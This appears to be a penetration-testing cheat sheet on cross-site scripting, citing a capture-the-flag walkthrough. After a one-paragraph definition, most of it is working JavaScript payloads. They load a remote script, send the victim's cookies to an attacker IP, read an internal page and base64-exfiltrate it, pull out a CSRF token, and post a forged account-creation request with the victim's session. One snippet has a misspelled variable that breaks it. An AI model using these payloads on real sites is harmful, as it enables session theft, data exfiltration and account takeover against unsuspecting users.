XSS

Description

Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.

Usage

<script src="http://10.10.14.10/0.js"></script>

Scripts

Steal cookiesGet the response from an internal pageParse CSRF tokenPOST request with the same session

document.location = "http://10.10.14.10/" + document.cookie;

var req = new XMLHttpRequest();
req.open("GET", "http://internal.qu35t.pw/", false);
req.send();
var response = req.responseText;

var req2 = new XMLHttpRequest();
req2.open("GET", "http://10.10.14.10/" + btoa(response), true);
req2.send();

var req = new XMLHttpRequest();
req.open("GET", "http://internal.qu35t.pw/", false);
req.withCredentials = true;
req.send();
var response = req.responseText;

var parser = new DOMParser();
var htmlDoc = parser.parseFromString(response, 'text/html');
var token = htmlDoc.getElementsByName("_token")[0].value;

var req2 = new XMLHttpRequest();
req2.open("GET", "http://10.10.14.10/" + tokrn, true);
req2.send();

var req = new XMLHttpRequest();
req.open("GET", "http://internal.qu35t.pw/", false);
req.withCredentials = true;
req.send();
var response = req.responseText;

var req2 = new XMLHttpRequest();
req2.withCredentials = true;
var params = "username=qu35t&pass=qu35t";
req2.open("POST", "http://internal.qu35t.pw/create", false);
req2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req2.send(params);

References

• Ippsec - Crossfit
• Ippsec - Crossfit
• Ippsec - Crossfit
• Synopsys - XSS